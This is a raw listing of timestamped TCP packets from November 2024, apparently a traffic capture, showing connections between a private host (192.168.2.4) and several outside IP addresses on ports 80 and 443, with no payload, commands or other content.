Nov 11, 2024 01:14:23.355901003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.355916977 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355928898 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355932951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.355938911 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355950117 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.355952978 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355964899 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355977058 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355977058 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.355988979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.355998993 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356002092 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356020927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356045008 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356054068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356066942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356077909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356090069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356096983 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356122017 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356143951 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356230021 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356242895 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356254101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356260061 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356271029 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356276035 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356290102 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356297970 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356302023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356317043 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356344938 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356376886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356389999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356401920 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356412888 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356412888 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356426001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356437922 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356446028 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356448889 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356462955 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356471062 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356476068 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356481075 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356498003 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356507063 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356518984 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.356525898 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356549978 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.356555939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.357650042 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.357801914 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387713909 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387733936 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387747049 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387758017 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387772083 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387772083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387784004 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387835026 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387948036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387948036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387948036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387948036 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.387981892 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.387993097 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388004065 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388016939 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388019085 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388031960 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388058901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388163090 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388175964 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388186932 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388199091 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388199091 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388219118 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388226032 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388238907 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388257027 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388297081 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388307095 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388317108 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388329029 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388339043 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388340950 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388353109 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388359070 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388364077 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388369083 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388389111 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388402939 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388422966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388437033 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388447046 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388458967 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388465881 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388472080 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388477087 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388484001 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388493061 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388516903 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388526917 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388580084 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388597012 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388607979 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388619900 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388622999 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388633966 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388639927 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388645887 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388655901 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388673067 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388691902 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388724089 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388736010 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388746023 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388806105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388806105 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388850927 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388885975 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388892889 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388896942 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388909101 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388920069 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388928890 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388950109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388950109 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388972044 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388972044 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.388984919 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.388995886 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.389008999 CET	80	49762	185.215.113.16	192.168.2.4
Nov 11, 2024 01:14:23.389044046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.389044046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.389044046 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:23.617027044 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:23.621859074 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:24.400552034 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:24.400877953 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:29.560873032 CET	80	49753	185.215.113.206	192.168.2.4
Nov 11, 2024 01:14:29.560930014 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:31.927218914 CET	49753	80	192.168.2.4	185.215.113.206
Nov 11, 2024 01:14:31.928431034 CET	49762	80	192.168.2.4	185.215.113.16
Nov 11, 2024 01:14:51.831382036 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:51.831429005 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:51.831492901 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:51.832155943 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:51.832166910 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.582849979 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.583017111 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.592847109 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.592859030 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.593050957 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.601795912 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.647330046 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.850795984 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.850821018 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.850836039 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.850879908 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.850893974 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.850919962 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.850949049 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.852432966 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.852478027 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.852498055 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.852504015 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.852533102 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.852543116 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.852586031 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.861186981 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.861197948 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:52.861207962 CET	49763	443	192.168.2.4	172.202.163.200
Nov 11, 2024 01:14:52.861212969 CET	443	49763	172.202.163.200	192.168.2.4
Nov 11, 2024 01:14:53.812184095 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:53.812215090 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:53.812344074 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:53.812592983 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:53.812602997 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.556576014 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.556719065 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.558362961 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.558371067 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.558569908 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.576334953 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.619327068 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.796309948 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.796331882 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.796345949 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.796451092 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.796466112 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.796610117 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.825501919 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.825534105 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.825589895 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.825597048 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.825637102 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.825637102 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.915251017 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.915273905 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.915468931 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.915481091 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.915703058 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.943619967 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.943635941 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.943833113 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.943840981 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.943888903 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.944865942 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.944880009 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.944943905 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.944950104 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.944991112 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.946665049 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.946681976 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.946738005 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:54.946743965 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:54.946785927 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.033931971 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.033951998 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.034001112 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.034019947 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.034032106 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.034059048 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.061371088 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.061388969 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.061444044 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.061454058 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.061492920 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.062225103 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.062249899 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.062305927 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.062311888 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.062351942 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.063532114 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.063546896 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.063584089 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.063587904 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.063613892 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.063627005 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.064476967 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.064491987 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.064577103 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.064582109 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.064621925 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.064644098 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.105525017 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.105544090 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.105715990 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.105715990 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.105722904 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.105763912 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152590990 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152606964 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152678967 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152686119 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152728081 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152777910 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152838945 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152847052 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152858019 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152894020 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152909994 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152921915 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.152934074 CET	49764	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.152939081 CET	443	49764	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.243310928 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.243354082 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.243432999 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.243460894 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.243479967 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.243539095 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.244005919 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.244014025 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.244095087 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245074034 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245106936 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245162964 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245227098 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245251894 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245306969 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245318890 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245326042 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245362997 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245382071 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245455980 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245467901 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245479107 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245491028 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.245552063 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.245563984 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.972050905 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.972624063 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.972659111 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.972784042 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.973167896 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.973186970 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.973274946 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.973279953 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.973618984 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.973624945 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.976063967 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.976382971 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.976402998 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.976743937 CET	49769	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.976748943 CET	443	49769	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.983700037 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.983999014 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.984023094 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.984390020 CET	49766	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.984395027 CET	443	49766	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.988748074 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.988992929 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.989012957 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:55.989345074 CET	49765	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:55.989348888 CET	443	49765	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.101358891 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.101468086 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.101552963 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.101757050 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.101773024 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.101789951 CET	49767	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.101795912 CET	443	49767	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.102943897 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.102965117 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.103030920 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.103043079 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.103256941 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.103256941 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.103269100 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.103399992 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.103426933 CET	443	49768	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.103477955 CET	49768	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105170965 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105195045 CET	443	49770	13.107.246.45	192.168.2.4
Nov 11, 2024 01:14:56.105334997 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105403900 CET	49770	443	192.168.2.4	13.107.246.45
Nov 11, 2024 01:14:56.105415106 CET	443	49770	13.107.246.45	192.168.2.4
